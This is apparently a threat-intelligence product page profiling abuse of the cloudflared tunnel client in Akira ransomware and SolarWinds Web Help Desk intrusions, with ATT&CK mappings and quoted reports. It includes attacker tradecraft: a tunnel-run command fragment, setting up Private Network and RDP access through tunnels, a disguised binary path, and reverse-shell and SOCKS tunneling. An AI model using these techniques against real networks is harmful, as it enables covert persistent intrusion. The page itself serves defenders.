Cloudflared
Cloudflared is the Cloudflare Tunnel client repeatedly observed in intrusion activity as a tunneling and remote-access utility rather than bespoke malware. In the provided reporting, threat actors used cloudflared.exe to establish persistent tunnels back to attacker-controlled infrastructure and create secondary backdoor communications paths for redundant access. It was observed in Akira ransomware intrusions, including one intrusion where an affiliate installed Cloudflare Tunnel via MSI and ran cloudflared.exe tunnel run -- token ..., and in a broader SonicWall SSL VPN campaign where protocol tunneling via Cloudflare Tunnel was documented among Akira tradecraft. It was also deployed during exploitation of SolarWinds Web Help Desk, where the attacker installed Cloudflared from GitHub’s official release channel after gaining code execution and used it as a secondary tunnel-based access path alongside other remote tooling. High-confidence behaviors in the content include persistent tunnel establishment, backdoor communications, and support for hands-on-keyboard post-compromise operations. Associated activity in the same incidents included reconnaissance, credential theft, lateral movement, data staging/exfiltration, and ransomware deployment by Akira affiliates. The content specifically identifies the executable name cloudflared.exe and references command-line tunnel execution as notable indicators.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“...CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation.”
"...followed immediately by the installation of Cloudflared from GitHub’s official release channel. This created a secondary tunnel-based access path..."
"...followed immediately by the installation of Cloudflared from GitHub’s official release channel. This created a secondary tunnel-based access path..."
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
1 technique
Initial Access
Execution
1 technique
Execution
Persistence
1 technique
Persistence
Privilege Escalation
1 technique
Privilege Escalation
Discovery
2 techniques
Discovery
As the attacker, I need to have some knowledge about the victim’s network environment to configure the tunnel to allow access to the Private Network. In this case, a simple ipconfig from the victim machine gets me some basic details demonstrating the IP address and subnet of the machine.
Lateral Movement
4 techniques
Lateral Movement
... TightVNC ... PsExec ... OpenSSH ... PowerShell Remoting (PSRemoting) ... RDP Patcher ... VS Code Tunnel ... Cloudflared ...
I can pre-configure a tunnel on the Cloudflare Dashboard with a Public Hostname for access.not-malicio.us hosting an RDP service at localhost:3389... Here we can see the successful connection established using Cloudflared’s access command, and the resulting RDP session pointing to localhost:3389.
Command and Control
7 techniques
Command and Control
Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host... Cloudflared tunnels traffic through the Cloudflare network.
Private Networks allows an administrator to provide access to an entire CIDR range through the tunnel, allowing a client device, such as an attacker’s machine, network access as though they were physically collocated with the victim machine hosting the tunnel... From here, an attacker can interact with any device in the private network.
Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared... A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave them layered persistence
That script downloaded and installed an MSI package in the background with no visible indication to the user. Separately, the attacker deployed EtherRAT... Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared.
Incident #2 The threat actor almost immediately installed Cloudflare’s freely available tunnelling software here, C :\ProgramData\windows_update.exe , followed by the download and execution of another dual-use agent, Radmin [T1572 – Protocol Tunneling ] [T1219 – Remote Access Software]
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Cloudflared was used to establish a reverse tunnel/persistent access channel during an Akira intrusion, providing command-and-control style connectivity.
Cloudflare Tunnel client used legitimately for secure tunneling, but frequently abused to establish persistent remote access tunnels.
Legitimate Cloudflare tunneling client abused to establish a redundant remote access tunnel for persistence/backup C2.
Cloudflare Tunnel client used to establish protocol tunneling/C2-like connectivity (backdoor communications) in the intrusion.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.